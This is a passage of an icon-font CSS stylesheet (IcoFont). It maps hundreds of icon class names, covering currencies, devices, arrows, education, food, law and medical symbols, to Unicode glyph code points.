  content: "\ea12";
}

.icofont-rupee-true:before
{
  content: "\ea13";
}

.icofont-rupee:before
{
  content: "\ea14";
}

.icofont-taka-false:before
{
  content: "\ea15";
}

.icofont-taka-minus:before
{
  content: "\ea16";
}

.icofont-taka-plus:before
{
  content: "\ea17";
}

.icofont-taka-true:before
{
  content: "\ea18";
}

.icofont-taka:before
{
  content: "\ea19";
}

.icofont-turkish-lira-false:before
{
  content: "\ea1a";
}

.icofont-turkish-lira-minus:before
{
  content: "\ea1b";
}

.icofont-turkish-lira-plus:before
{
  content: "\ea1c";
}

.icofont-turkish-lira-true:before
{
  content: "\ea1d";
}

.icofont-turkish-lira:before
{
  content: "\ea1e";
}

.icofont-won-false:before
{
  content: "\ea1f";
}

.icofont-won-minus:before
{
  content: "\ea20";
}

.icofont-won-plus:before
{
  content: "\ea21";
}

.icofont-won-true:before
{
  content: "\ea22";
}

.icofont-won:before
{
  content: "\ea23";
}

.icofont-yen-false:before
{
  content: "\ea24";
}

.icofont-yen-minus:before
{
  content: "\ea25";
}

.icofont-yen-plus:before
{
  content: "\ea26";
}

.icofont-yen-true:before
{
  content: "\ea27";
}

.icofont-yen:before
{
  content: "\ea28";
}

.icofont-android-nexus:before
{
  content: "\ea29";
}

.icofont-android-tablet:before
{
  content: "\ea2a";
}

.icofont-apple-watch:before
{
  content: "\ea2b";
}

.icofont-drawing-tablet:before
{
  content: "\ea2c";
}

.icofont-earphone:before
{
  content: "\ea2d";
}

.icofont-flash-drive:before
{
  content: "\ea2e";
}

.icofont-game-console:before
{
  content: "\ea2f";
}

.icofont-game-controller:before
{
  content: "\ea30";
}

.icofont-game-pad:before
{
  content: "\ea31";
}

.icofont-game:before
{
  content: "\ea32";
}

.icofont-headphone-alt-1:before
{
  content: "\ea33";
}

.icofont-headphone-alt-2:before
{
  content: "\ea34";
}

.icofont-headphone-alt-3:before
{
  content: "\ea35";
}

.icofont-headphone-alt:before
{
  content: "\ea36";
}

.icofont-headphone:before
{
  content: "\ea37";
}

.icofont-htc-one:before
{
  content: "\ea38";
}

.icofont-imac:before
{
  content: "\ea39";
}

.icofont-ipad:before
{
  content: "\ea3a";
}

.icofont-iphone:before
{
  content: "\ea3b";
}

.icofont-ipod-nano:before
{
  content: "\ea3c";
}

.icofont-ipod-touch:before
{
  content: "\ea3d";
}

.icofont-keyboard-alt:before
{
  content: "\ea3e";
}

.icofont-keyboard-wireless:before
{
  content: "\ea3f";
}

.icofont-keyboard:before
{
  content: "\ea40";
}

.icofont-laptop-alt:before
{
  content: "\ea41";
}

.icofont-laptop:before
{
  content: "\ea42";
}

.icofont-macbook:before
{
  content: "\ea43";
}

.icofont-magic-mouse:before
{
  content: "\ea44";
}

.icofont-micro-chip:before
{
  content: "\ea45";
}

.icofont-microphone-alt:before
{
  content: "\ea46";
}

.icofont-microphone:before
{
  content: "\ea47";
}

.icofont-monitor:before
{
  content: "\ea48";
}

.icofont-mouse:before
{
  content: "\ea49";
}

.icofont-mp3-player:before
{
  content: "\ea4a";
}

.icofont-nintendo:before
{
  content: "\ea4b";
}

.icofont-playstation-alt:before
{
  content: "\ea4c";
}

.icofont-psvita:before
{
  content: "\ea4d";
}

.icofont-radio-mic:before
{
  content: "\ea4e";
}

.icofont-radio:before
{
  content: "\ea4f";
}

.icofont-refrigerator:before
{
  content: "\ea50";
}

.icofont-samsung-galaxy:before
{
  content: "\ea51";
}

.icofont-surface-tablet:before
{
  content: "\ea52";
}

.icofont-ui-head-phone:before
{
  content: "\ea53";
}

.icofont-ui-keyboard:before
{
  content: "\ea54";
}

.icofont-washing-machine:before
{
  content: "\ea55";
}

.icofont-wifi-router:before
{
  content: "\ea56";
}

.icofont-wii-u:before
{
  content: "\ea57";
}

.icofont-windows-lumia:before
{
  content: "\ea58";
}

.icofont-wireless-mouse:before
{
  content: "\ea59";
}

.icofont-xbox-360:before
{
  content: "\ea5a";
}

.icofont-arrow-down:before
{
  content: "\ea5b";
}

.icofont-arrow-left:before
{
  content: "\ea5c";
}

.icofont-arrow-right:before
{
  content: "\ea5d";
}

.icofont-arrow-up:before
{
  content: "\ea5e";
}

.icofont-block-down:before
{
  content: "\ea5f";
}

.icofont-block-left:before
{
  content: "\ea60";
}

.icofont-block-right:before
{
  content: "\ea61";
}

.icofont-block-up:before
{
  content: "\ea62";
}

.icofont-bubble-down:before
{
  content: "\ea63";
}

.icofont-bubble-left:before
{
  content: "\ea64";
}

.icofont-bubble-right:before
{
  content: "\ea65";
}

.icofont-bubble-up:before
{
  content: "\ea66";
}

.icofont-caret-down:before
{
  content: "\ea67";
}

.icofont-caret-left:before
{
  content: "\ea68";
}

.icofont-caret-right:before
{
  content: "\ea69";
}

.icofont-caret-up:before
{
  content: "\ea6a";
}

.icofont-circled-down:before
{
  content: "\ea6b";
}

.icofont-circled-left:before
{
  content: "\ea6c";
}

.icofont-circled-right:before
{
  content: "\ea6d";
}

.icofont-circled-up:before
{
  content: "\ea6e";
}

.icofont-collapse:before
{
  content: "\ea6f";
}

.icofont-cursor-drag:before
{
  content: "\ea70";
}

.icofont-curved-double-left:before
{
  content: "\ea71";
}

.icofont-curved-double-right:before
{
  content: "\ea72";
}

.icofont-curved-down:before
{
  content: "\ea73";
}

.icofont-curved-left:before
{
  content: "\ea74";
}

.icofont-curved-right:before
{
  content: "\ea75";
}

.icofont-curved-up:before
{
  content: "\ea76";
}

.icofont-dotted-down:before
{
  content: "\ea77";
}

.icofont-dotted-left:before
{
  content: "\ea78";
}

.icofont-dotted-right:before
{
  content: "\ea79";
}

.icofont-dotted-up:before
{
  content: "\ea7a";
}

.icofont-double-left:before
{
  content: "\ea7b";
}

.icofont-double-right:before
{
  content: "\ea7c";
}

.icofont-expand-alt:before
{
  content: "\ea7d";
}

.icofont-hand-down:before
{
  content: "\ea7e";
}

.icofont-hand-drag:before
{
  content: "\ea7f";
}

.icofont-hand-drag1:before
{
  content: "\ea80";
}

.icofont-hand-drag2:before
{
  content: "\ea81";
}

.icofont-hand-drawn-alt-down:before
{
  content: "\ea82";
}

.icofont-hand-drawn-alt-left:before
{
  content: "\ea83";
}

.icofont-hand-drawn-alt-right:before
{
  content: "\ea84";
}

.icofont-hand-drawn-alt-up:before
{
  content: "\ea85";
}

.icofont-hand-drawn-down:before
{
  content: "\ea86";
}

.icofont-hand-drawn-left:before
{
  content: "\ea87";
}

.icofont-hand-drawn-right:before
{
  content: "\ea88";
}

.icofont-hand-drawn-up:before
{
  content: "\ea89";
}

.icofont-hand-grippers:before
{
  content: "\ea8a";
}

.icofont-hand-left:before
{
  content: "\ea8b";
}

.icofont-hand-right:before
{
  content: "\ea8c";
}

.icofont-hand-up:before
{
  content: "\ea8d";
}

.icofont-line-block-down:before
{
  content: "\ea8e";
}

.icofont-line-block-left:before
{
  content: "\ea8f";
}

.icofont-line-block-right:before
{
  content: "\ea90";
}

.icofont-line-block-up:before
{
  content: "\ea91";
}

.icofont-long-arrow-down:before
{
  content: "\ea92";
}

.icofont-long-arrow-left:before
{
  content: "\ea93";
}

.icofont-long-arrow-right:before
{
  content: "\ea94";
}

.icofont-long-arrow-up:before
{
  content: "\ea95";
}

.icofont-rounded-collapse:before
{
  content: "\ea96";
}

.icofont-rounded-double-left:before
{
  content: "\ea97";
}

.icofont-rounded-double-right:before
{
  content: "\ea98";
}

.icofont-rounded-down:before
{
  content: "\ea99";
}

.icofont-rounded-expand:before
{
  content: "\ea9a";
}

.icofont-rounded-left-down:before
{
  content: "\ea9b";
}

.icofont-rounded-left-up:before
{
  content: "\ea9c";
}

.icofont-rounded-left:before
{
  content: "\ea9d";
}

.icofont-rounded-right-down:before
{
  content: "\ea9e";
}

.icofont-rounded-right-up:before
{
  content: "\ea9f";
}

.icofont-rounded-right:before
{
  content: "\eaa0";
}

.icofont-rounded-up:before
{
  content: "\eaa1";
}

.icofont-scroll-bubble-down:before
{
  content: "\eaa2";
}

.icofont-scroll-bubble-left:before
{
  content: "\eaa3";
}

.icofont-scroll-bubble-right:before
{
  content: "\eaa4";
}

.icofont-scroll-bubble-up:before
{
  content: "\eaa5";
}

.icofont-scroll-double-down:before
{
  content: "\eaa6";
}

.icofont-scroll-double-left:before
{
  content: "\eaa7";
}

.icofont-scroll-double-right:before
{
  content: "\eaa8";
}

.icofont-scroll-double-up:before
{
  content: "\eaa9";
}

.icofont-scroll-down:before
{
  content: "\eaaa";
}

.icofont-scroll-left:before
{
  content: "\eaab";
}

.icofont-scroll-long-down:before
{
  content: "\eaac";
}

.icofont-scroll-long-left:before
{
  content: "\eaad";
}

.icofont-scroll-long-right:before
{
  content: "\eaae";
}

.icofont-scroll-long-up:before
{
  content: "\eaaf";
}

.icofont-scroll-right:before
{
  content: "\eab0";
}

.icofont-scroll-up:before
{
  content: "\eab1";
}

.icofont-simple-down:before
{
  content: "\eab2";
}

.icofont-simple-left-down:before
{
  content: "\eab3";
}

.icofont-simple-left-up:before
{
  content: "\eab4";
}

.icofont-simple-left:before
{
  content: "\eab5";
}

.icofont-simple-right-down:before
{
  content: "\eab6";
}

.icofont-simple-right-up:before
{
  content: "\eab7";
}

.icofont-simple-right:before
{
  content: "\eab8";
}

.icofont-simple-up:before
{
  content: "\eab9";
}

.icofont-square-down:before
{
  content: "\eaba";
}

.icofont-square-left:before
{
  content: "\eabb";
}

.icofont-square-right:before
{
  content: "\eabc";
}

.icofont-square-up:before
{
  content: "\eabd";
}

.icofont-stylish-down:before
{
  content: "\eabe";
}

.icofont-stylish-left:before
{
  content: "\eabf";
}

.icofont-stylish-right:before
{
  content: "\eac0";
}

.icofont-stylish-up:before
{
  content: "\eac1";
}

.icofont-swoosh-down:before
{
  content: "\eac2";
}

.icofont-swoosh-left:before
{
  content: "\eac3";
}

.icofont-swoosh-right:before
{
  content: "\eac4";
}

.icofont-swoosh-up:before
{
  content: "\eac5";
}

.icofont-thin-double-left:before
{
  content: "\eac6";
}

.icofont-thin-double-right:before
{
  content: "\eac7";
}

.icofont-thin-down:before
{
  content: "\eac8";
}

.icofont-thin-left:before
{
  content: "\eac9";
}

.icofont-thin-right:before
{
  content: "\eaca";
}

.icofont-thin-up:before
{
  content: "\eacb";
}

.icofont-abc:before
{
  content: "\eacc";
}

.icofont-atom:before
{
  content: "\eacd";
}

.icofont-award:before
{
  content: "\eace";
}

.icofont-bell-alt:before
{
  content: "\eacf";
}

.icofont-black-board:before
{
  content: "\ead0";
}

.icofont-book-alt:before
{
  content: "\ead1";
}

.icofont-book:before
{
  content: "\ead2";
}

.icofont-brainstorming:before
{
  content: "\ead3";
}

.icofont-certificate-alt-1:before
{
  content: "\ead4";
}

.icofont-certificate-alt-2:before
{
  content: "\ead5";
}

.icofont-certificate:before
{
  content: "\ead6";
}

.icofont-education:before
{
  content: "\ead7";
}

.icofont-electron:before
{
  content: "\ead8";
}

.icofont-fountain-pen:before
{
  content: "\ead9";
}

.icofont-globe-alt:before
{
  content: "\eada";
}

.icofont-graduate-alt:before
{
  content: "\eadb";
}

.icofont-graduate:before
{
  content: "\eadc";
}

.icofont-group-students:before
{
  content: "\eadd";
}

.icofont-hat-alt:before
{
  content: "\eade";
}

.icofont-hat:before
{
  content: "\eadf";
}

.icofont-instrument:before
{
  content: "\eae0";
}

.icofont-lamp-light:before
{
  content: "\eae1";
}

.icofont-medal:before
{
  content: "\eae2";
}

.icofont-microscope-alt:before
{
  content: "\eae3";
}

.icofont-microscope:before
{
  content: "\eae4";
}

.icofont-paper:before
{
  content: "\eae5";
}

.icofont-pen-alt-4:before
{
  content: "\eae6";
}

.icofont-pen-nib:before
{
  content: "\eae7";
}

.icofont-pencil-alt-5:before
{
  content: "\eae8";
}

.icofont-quill-pen:before
{
  content: "\eae9";
}

.icofont-read-book-alt:before
{
  content: "\eaea";
}

.icofont-read-book:before
{
  content: "\eaeb";
}

.icofont-school-bag:before
{
  content: "\eaec";
}

.icofont-school-bus:before
{
  content: "\eaed";
}

.icofont-student-alt:before
{
  content: "\eaee";
}

.icofont-student:before
{
  content: "\eaef";
}

.icofont-teacher:before
{
  content: "\eaf0";
}

.icofont-test-bulb:before
{
  content: "\eaf1";
}

.icofont-test-tube-alt:before
{
  content: "\eaf2";
}

.icofont-university:before
{
  content: "\eaf3";
}

.icofont-angry:before
{
  content: "\eaf4";
}

.icofont-astonished:before
{
  content: "\eaf5";
}

.icofont-confounded:before
{
  content: "\eaf6";
}

.icofont-confused:before
{
  content: "\eaf7";
}

.icofont-crying:before
{
  content: "\eaf8";
}

.icofont-dizzy:before
{
  content: "\eaf9";
}

.icofont-expressionless:before
{
  content: "\eafa";
}

.icofont-heart-eyes:before
{
  content: "\eafb";
}

.icofont-laughing:before
{
  content: "\eafc";
}

.icofont-nerd-smile:before
{
  content: "\eafd";
}

.icofont-open-mouth:before
{
  content: "\eafe";
}

.icofont-rage:before
{
  content: "\eaff";
}

.icofont-rolling-eyes:before
{
  content: "\eb00";
}

.icofont-sad:before
{
  content: "\eb01";
}

.icofont-simple-smile:before
{
  content: "\eb02";
}

.icofont-slightly-smile:before
{
  content: "\eb03";
}

.icofont-smirk:before
{
  content: "\eb04";
}

.icofont-stuck-out-tongue:before
{
  content: "\eb05";
}

.icofont-wink-smile:before
{
  content: "\eb06";
}

.icofont-worried:before
{
  content: "\eb07";
}

.icofont-file-alt:before
{
  content: "\eb08";
}

.icofont-file-audio:before
{
  content: "\eb09";
}

.icofont-file-avi-mp4:before
{
  content: "\eb0a";
}

.icofont-file-bmp:before
{
  content: "\eb0b";
}

.icofont-file-code:before
{
  content: "\eb0c";
}

.icofont-file-css:before
{
  content: "\eb0d";
}

.icofont-file-document:before
{
  content: "\eb0e";
}

.icofont-file-eps:before
{
  content: "\eb0f";
}

.icofont-file-excel:before
{
  content: "\eb10";
}

.icofont-file-exe:before
{
  content: "\eb11";
}

.icofont-file-file:before
{
  content: "\eb12";
}

.icofont-file-flv:before
{
  content: "\eb13";
}

.icofont-file-gif:before
{
  content: "\eb14";
}

.icofont-file-html5:before
{
  content: "\eb15";
}

.icofont-file-image:before
{
  content: "\eb16";
}

.icofont-file-iso:before
{
  content: "\eb17";
}

.icofont-file-java:before
{
  content: "\eb18";
}

.icofont-file-javascript:before
{
  content: "\eb19";
}

.icofont-file-jpg:before
{
  content: "\eb1a";
}

.icofont-file-midi:before
{
  content: "\eb1b";
}

.icofont-file-mov:before
{
  content: "\eb1c";
}

.icofont-file-mp3:before
{
  content: "\eb1d";
}

.icofont-file-pdf:before
{
  content: "\eb1e";
}

.icofont-file-php:before
{
  content: "\eb1f";
}

.icofont-file-png:before
{
  content: "\eb20";
}

.icofont-file-powerpoint:before
{
  content: "\eb21";
}

.icofont-file-presentation:before
{
  content: "\eb22";
}

.icofont-file-psb:before
{
  content: "\eb23";
}

.icofont-file-psd:before
{
  content: "\eb24";
}

.icofont-file-python:before
{
  content: "\eb25";
}

.icofont-file-ruby:before
{
  content: "\eb26";
}

.icofont-file-spreadsheet:before
{
  content: "\eb27";
}

.icofont-file-sql:before
{
  content: "\eb28";
}

.icofont-file-svg:before
{
  content: "\eb29";
}

.icofont-file-text:before
{
  content: "\eb2a";
}

.icofont-file-tiff:before
{
  content: "\eb2b";
}

.icofont-file-video:before
{
  content: "\eb2c";
}

.icofont-file-wave:before
{
  content: "\eb2d";
}

.icofont-file-wmv:before
{
  content: "\eb2e";
}

.icofont-file-word:before
{
  content: "\eb2f";
}

.icofont-file-zip:before
{
  content: "\eb30";
}

.icofont-cycling-alt:before
{
  content: "\eb31";
}

.icofont-cycling:before
{
  content: "\eb32";
}

.icofont-dumbbell:before
{
  content: "\eb33";
}

.icofont-dumbbells:before
{
  content: "\eb34";
}

.icofont-gym-alt-1:before
{
  content: "\eb35";
}

.icofont-gym-alt-2:before
{
  content: "\eb36";
}

.icofont-gym-alt-3:before
{
  content: "\eb37";
}

.icofont-gym:before
{
  content: "\eb38";
}

.icofont-muscle-weight:before
{
  content: "\eb39";
}

.icofont-muscle:before
{
  content: "\eb3a";
}

.icofont-apple:before
{
  content: "\eb3b";
}

.icofont-arabian-coffee:before
{
  content: "\eb3c";
}

.icofont-artichoke:before
{
  content: "\eb3d";
}

.icofont-asparagus:before
{
  content: "\eb3e";
}

.icofont-avocado:before
{
  content: "\eb3f";
}

.icofont-baby-food:before
{
  content: "\eb40";
}

.icofont-banana:before
{
  content: "\eb41";
}

.icofont-bbq:before
{
  content: "\eb42";
}

.icofont-beans:before
{
  content: "\eb43";
}

.icofont-beer:before
{
  content: "\eb44";
}

.icofont-bell-pepper-capsicum:before
{
  content: "\eb45";
}

.icofont-birthday-cake:before
{
  content: "\eb46";
}

.icofont-bread:before
{
  content: "\eb47";
}

.icofont-broccoli:before
{
  content: "\eb48";
}

.icofont-burger:before
{
  content: "\eb49";
}

.icofont-cabbage:before
{
  content: "\eb4a";
}

.icofont-carrot:before
{
  content: "\eb4b";
}

.icofont-cauli-flower:before
{
  content: "\eb4c";
}

.icofont-cheese:before
{
  content: "\eb4d";
}

.icofont-chef:before
{
  content: "\eb4e";
}

.icofont-cherry:before
{
  content: "\eb4f";
}

.icofont-chicken-fry:before
{
  content: "\eb50";
}

.icofont-chicken:before
{
  content: "\eb51";
}

.icofont-cocktail:before
{
  content: "\eb52";
}

.icofont-coconut-water:before
{
  content: "\eb53";
}

.icofont-coconut:before
{
  content: "\eb54";
}

.icofont-coffee-alt:before
{
  content: "\eb55";
}

.icofont-coffee-cup:before
{
  content: "\eb56";
}

.icofont-coffee-mug:before
{
  content: "\eb57";
}

.icofont-coffee-pot:before
{
  content: "\eb58";
}

.icofont-cola:before
{
  content: "\eb59";
}

.icofont-corn:before
{
  content: "\eb5a";
}

.icofont-croissant:before
{
  content: "\eb5b";
}

.icofont-crop-plant:before
{
  content: "\eb5c";
}

.icofont-cucumber:before
{
  content: "\eb5d";
}

.icofont-culinary:before
{
  content: "\eb5e";
}

.icofont-cup-cake:before
{
  content: "\eb5f";
}

.icofont-dining-table:before
{
  content: "\eb60";
}

.icofont-donut:before
{
  content: "\eb61";
}

.icofont-egg-plant:before
{
  content: "\eb62";
}

.icofont-egg-poached:before
{
  content: "\eb63";
}

.icofont-farmer-alt:before
{
  content: "\eb64";
}

.icofont-farmer:before
{
  content: "\eb65";
}

.icofont-fast-food:before
{
  content: "\eb66";
}

.icofont-food-basket:before
{
  content: "\eb67";
}

.icofont-food-cart:before
{
  content: "\eb68";
}

.icofont-fork-and-knife:before
{
  content: "\eb69";
}

.icofont-french-fries:before
{
  content: "\eb6a";
}

.icofont-fruits:before
{
  content: "\eb6b";
}

.icofont-grapes:before
{
  content: "\eb6c";
}

.icofont-honey:before
{
  content: "\eb6d";
}

.icofont-hot-dog:before
{
  content: "\eb6e";
}

.icofont-ice-cream-alt:before
{
  content: "\eb6f";
}

.icofont-ice-cream:before
{
  content: "\eb70";
}

.icofont-juice:before
{
  content: "\eb71";
}

.icofont-ketchup:before
{
  content: "\eb72";
}

.icofont-kiwi:before
{
  content: "\eb73";
}

.icofont-layered-cake:before
{
  content: "\eb74";
}

.icofont-lemon-alt:before
{
  content: "\eb75";
}

.icofont-lemon:before
{
  content: "\eb76";
}

.icofont-lobster:before
{
  content: "\eb77";
}

.icofont-mango:before
{
  content: "\eb78";
}

.icofont-milk:before
{
  content: "\eb79";
}

.icofont-mushroom:before
{
  content: "\eb7a";
}

.icofont-noodles:before
{
  content: "\eb7b";
}

.icofont-onion:before
{
  content: "\eb7c";
}

.icofont-orange:before
{
  content: "\eb7d";
}

.icofont-pear:before
{
  content: "\eb7e";
}

.icofont-peas:before
{
  content: "\eb7f";
}

.icofont-pepper:before
{
  content: "\eb80";
}

.icofont-pie-alt:before
{
  content: "\eb81";
}

.icofont-pie:before
{
  content: "\eb82";
}

.icofont-pineapple:before
{
  content: "\eb83";
}

.icofont-pizza-slice:before
{
  content: "\eb84";
}

.icofont-pizza:before
{
  content: "\eb85";
}

.icofont-plant:before
{
  content: "\eb86";
}

.icofont-popcorn:before
{
  content: "\eb87";
}

.icofont-potato:before
{
  content: "\eb88";
}

.icofont-pumpkin:before
{
  content: "\eb89";
}

.icofont-raddish:before
{
  content: "\eb8a";
}

.icofont-restaurant-menu:before
{
  content: "\eb8b";
}

.icofont-restaurant:before
{
  content: "\eb8c";
}

.icofont-salt-and-pepper:before
{
  content: "\eb8d";
}

.icofont-sandwich:before
{
  content: "\eb8e";
}

.icofont-sausage:before
{
  content: "\eb8f";
}

.icofont-soft-drinks:before
{
  content: "\eb90";
}

.icofont-soup-bowl:before
{
  content: "\eb91";
}

.icofont-spoon-and-fork:before
{
  content: "\eb92";
}

.icofont-steak:before
{
  content: "\eb93";
}

.icofont-strawberry:before
{
  content: "\eb94";
}

.icofont-sub-sandwich:before
{
  content: "\eb95";
}

.icofont-sushi:before
{
  content: "\eb96";
}

.icofont-taco:before
{
  content: "\eb97";
}

.icofont-tea-pot:before
{
  content: "\eb98";
}

.icofont-tea:before
{
  content: "\eb99";
}

.icofont-tomato:before
{
  content: "\eb9a";
}

.icofont-watermelon:before
{
  content: "\eb9b";
}

.icofont-wheat:before
{
  content: "\eb9c";
}

.icofont-baby-backpack:before
{
  content: "\eb9d";
}

.icofont-baby-cloth:before
{
  content: "\eb9e";
}

.icofont-baby-milk-bottle:before
{
  content: "\eb9f";
}

.icofont-baby-trolley:before
{
  content: "\eba0";
}

.icofont-baby:before
{
  content: "\eba1";
}

.icofont-candy:before
{
  content: "\eba2";
}

.icofont-holding-hands:before
{
  content: "\eba3";
}

.icofont-infant-nipple:before
{
  content: "\eba4";
}

.icofont-kids-scooter:before
{
  content: "\eba5";
}

.icofont-safety-pin:before
{
  content: "\eba6";
}

.icofont-teddy-bear:before
{
  content: "\eba7";
}

.icofont-toy-ball:before
{
  content: "\eba8";
}

.icofont-toy-cat:before
{
  content: "\eba9";
}

.icofont-toy-duck:before
{
  content: "\ebaa";
}

.icofont-toy-elephant:before
{
  content: "\ebab";
}

.icofont-toy-hand:before
{
  content: "\ebac";
}

.icofont-toy-horse:before
{
  content: "\ebad";
}

.icofont-toy-lattu:before
{
  content: "\ebae";
}

.icofont-toy-train:before
{
  content: "\ebaf";
}

.icofont-burglar:before
{
  content: "\ebb0";
}

.icofont-cannon-firing:before
{
  content: "\ebb1";
}

.icofont-cc-camera:before
{
  content: "\ebb2";
}

.icofont-cop-badge:before
{
  content: "\ebb3";
}

.icofont-cop:before
{
  content: "\ebb4";
}

.icofont-court-hammer:before
{
  content: "\ebb5";
}

.icofont-court:before
{
  content: "\ebb6";
}

.icofont-finger-print:before
{
  content: "\ebb7";
}

.icofont-gavel:before
{
  content: "\ebb8";
}

.icofont-handcuff-alt:before
{
  content: "\ebb9";
}

.icofont-handcuff:before
{
  content: "\ebba";
}

.icofont-investigation:before
{
  content: "\ebbb";
}

.icofont-investigator:before
{
  content: "\ebbc";
}

.icofont-jail:before
{
  content: "\ebbd";
}

.icofont-judge:before
{
  content: "\ebbe";
}

.icofont-law-alt-1:before
{
  content: "\ebbf";
}

.icofont-law-alt-2:before
{
  content: "\ebc0";
}

.icofont-law-alt-3:before
{
  content: "\ebc1";
}

.icofont-law-book:before
{
  content: "\ebc2";
}

.icofont-law-document:before
{
  content: "\ebc3";
}

.icofont-law-order:before
{
  content: "\ebc4";
}

.icofont-law-protect:before
{
  content: "\ebc5";
}

.icofont-law-scales:before
{
  content: "\ebc6";
}

.icofont-law:before
{
  content: "\ebc7";
}

.icofont-lawyer-alt-1:before
{
  content: "\ebc8";
}

.icofont-lawyer-alt-2:before
{
  content: "\ebc9";
}

.icofont-lawyer:before
{
  content: "\ebca";
}

.icofont-legal:before
{
  content: "\ebcb";
}

.icofont-pistol:before
{
  content: "\ebcc";
}

.icofont-police-badge:before
{
  content: "\ebcd";
}

.icofont-police-cap:before
{
  content: "\ebce";
}

.icofont-police-car-alt-1:before
{
  content: "\ebcf";
}

.icofont-police-car-alt-2:before
{
  content: "\ebd0";
}

.icofont-police-car:before
{
  content: "\ebd1";
}

.icofont-police-hat:before
{
  content: "\ebd2";
}

.icofont-police-van:before
{
  content: "\ebd3";
}

.icofont-police:before
{
  content: "\ebd4";
}

.icofont-thief-alt:before
{
  content: "\ebd5";
}

.icofont-thief:before
{
  content: "\ebd6";
}

.icofont-abacus-alt:before
{
  content: "\ebd7";
}

.icofont-abacus:before
{
  content: "\ebd8";
}

.icofont-angle-180:before
{
  content: "\ebd9";
}

.icofont-angle-45:before
{
  content: "\ebda";
}

.icofont-angle-90:before
{
  content: "\ebdb";
}

.icofont-angle:before
{
  content: "\ebdc";
}

.icofont-calculator-alt-1:before
{
  content: "\ebdd";
}

.icofont-calculator-alt-2:before
{
  content: "\ebde";
}

.icofont-calculator:before
{
  content: "\ebdf";
}

.icofont-circle-ruler-alt:before
{
  content: "\ebe0";
}

.icofont-circle-ruler:before
{
  content: "\ebe1";
}

.icofont-compass-alt-1:before
{
  content: "\ebe2";
}

.icofont-compass-alt-2:before
{
  content: "\ebe3";
}

.icofont-compass-alt-3:before
{
  content: "\ebe4";
}

.icofont-compass-alt-4:before
{
  content: "\ebe5";
}

.icofont-golden-ratio:before
{
  content: "\ebe6";
}

.icofont-marker-alt-1:before
{
  content: "\ebe7";
}

.icofont-marker-alt-2:before
{
  content: "\ebe8";
}

.icofont-marker-alt-3:before
{
  content: "\ebe9";
}

.icofont-marker:before
{
  content: "\ebea";
}

.icofont-math:before
{
  content: "\ebeb";
}

.icofont-mathematical-alt-1:before
{
  content: "\ebec";
}

.icofont-mathematical-alt-2:before
{
  content: "\ebed";
}

.icofont-mathematical:before
{
  content: "\ebee";
}

.icofont-pen-alt-1:before
{
  content: "\ebef";
}

.icofont-pen-alt-2:before
{
  content: "\ebf0";
}

.icofont-pen-alt-3:before
{
  content: "\ebf1";
}

.icofont-pen-holder-alt-1:before
{
  content: "\ebf2";
}

.icofont-pen-holder:before
{
  content: "\ebf3";
}

.icofont-pen:before
{
  content: "\ebf4";
}

.icofont-pencil-alt-1:before
{
  content: "\ebf5";
}

.icofont-pencil-alt-2:before
{
  content: "\ebf6";
}

.icofont-pencil-alt-3:before
{
  content: "\ebf7";
}

.icofont-pencil-alt-4:before
{
  content: "\ebf8";
}

.icofont-pencil:before
{
  content: "\ebf9";
}

.icofont-ruler-alt-1:before
{
  content: "\ebfa";
}

.icofont-ruler-alt-2:before
{
  content: "\ebfb";
}

.icofont-ruler-compass-alt:before
{
  content: "\ebfc";
}

.icofont-ruler-compass:before
{
  content: "\ebfd";
}

.icofont-ruler-pencil-alt-1:before
{
  content: "\ebfe";
}

.icofont-ruler-pencil-alt-2:before
{
  content: "\ebff";
}

.icofont-ruler-pencil:before
{
  content: "\ec00";
}

.icofont-ruler:before
{
  content: "\ec01";
}

.icofont-rulers-alt:before
{
  content: "\ec02";
}

.icofont-rulers:before
{
  content: "\ec03";
}

.icofont-square-root:before
{
  content: "\ec04";
}

.icofont-ui-calculator:before
{
  content: "\ec05";
}

.icofont-aids:before
{
  content: "\ec06";
}

.icofont-ambulance-crescent:before
{
  content: "\ec07";
}

.icofont-ambulance-cross:before
{
  content: "\ec08";
}

.icofont-ambulance:before
{
  content: "\ec09";
}

.icofont-autism:before
{
  content: "\ec0a";
}

.icofont-bandage:before
{
  content: "\ec0b";
}

.icofont-blind:before
{
  content: "\ec0c";
}

.icofont-blood-drop:before
{
  content: "\ec0d";
}

.icofont-blood-test:before
{
  content: "\ec0e";
}

.icofont-blood:before
{
  content: "\ec0f";
}

.icofont-brain-alt:before
{
  content: "\ec10";
}

.icofont-brain:before
{
  content: "\ec11";
}

.icofont-capsule:before
{
  content: "\ec12";
}

.icofont-crutch:before
{
  content: "\ec13";
}

.icofont-disabled:before
{
  content: "\ec14";
}

.icofont-dna-alt-1:before
{
  content: "\ec15";
}

.icofont-dna-alt-2:before
{
  content: "\ec16";
}

.icofont-dna:before
{
  content: "\ec17";
}

.icofont-doctor-alt:before
{
  content: "\ec18";
}

.icofont-doctor:before
{
  content: "\ec19";
}

.icofont-drug-pack:before
{
  content: "\ec1a";
}

.icofont-drug:before
{
  content: "\ec1b";
}

.icofont-first-aid-alt:before
{
  content: "\ec1c";
}

.icofont-first-aid:before
{
  content: "\ec1d";
}

.icofont-heart-beat-alt:before
{
  content: "\ec1e";
}

.icofont-heart-beat:before
{
  content: "\ec1f";
}

.icofont-heartbeat:before
{
  content: "\ec20";
}

.icofont-herbal:before
{
  content: "\ec21";
}

.icofont-hospital:before
{
  content: "\ec22";
}

.icofont-icu:before
{
  content: "\ec23";
}

.icofont-injection-syringe:before
{
  content: "\ec24";
}

.icofont-laboratory:before
{
  content: "\ec25";
}

.icofont-medical-sign-alt:before
{
  content: "\ec26";
}

.icofont-medical-sign:before
{
  content: "\ec27";
}

.icofont-nurse-alt:before
{
  content: "\ec28";
}

.icofont-nurse:before
{
  content: "\ec29";
}

.icofont-nursing-home:before
{
  content: "\ec2a";
}

.icofont-operation-theater:before
{
  content: "\ec2b";
}

.icofont-paralysis-disability:before
{
  content: "\ec2c";
}

.icofont-patient-bed:before
{
  content: "\ec2d";
}

.icofont-patient-file:before
{
  content: "\ec2e";
}

.icofont-pills:before
{
  content: "\ec2f";
}

.icofont-prescription:before
{
  content: "\ec30";
}

.icofont-pulse:before
{
  content: "\ec31";
}

.icofont-stethoscope-alt:before
{
  content: "\ec32";
}

.icofont-stethoscope:before
{
  content: "\ec33";
}

.icofont-stretcher:before
{
  content: "\ec34";
}

.icofont-surgeon-alt:before
{
  content: "\ec35";
}

.icofont-surgeon:before
{
  content: "\ec36";
}

.icofont-tablets:before
{
  content: "\ec37";
}

.icofont-test-bottle:before
{
  content: "\ec38";
}

.icofont-test-tube:before
{
  content: "\ec39";
}

.icofont-thermometer-alt:before
{
  content: "\ec3a";
}

